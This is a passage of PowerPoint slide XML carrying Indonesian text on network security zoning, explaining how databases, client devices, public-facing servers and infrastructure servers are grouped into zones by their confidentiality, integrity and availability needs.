              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memetakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>topologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> internal, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Database dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memprioritaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>boleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pikirkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampaknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disusupi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampaknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memisahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memprioritaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat-perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rendah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berhadapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (web, email, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagainya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memprioritaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>boleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Server yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>boleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dianggap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sepenuhnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>direktori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencatatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menunjukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompromi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> daftar zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibutuhkan</a:t>
            </a:r>
            <a:r>
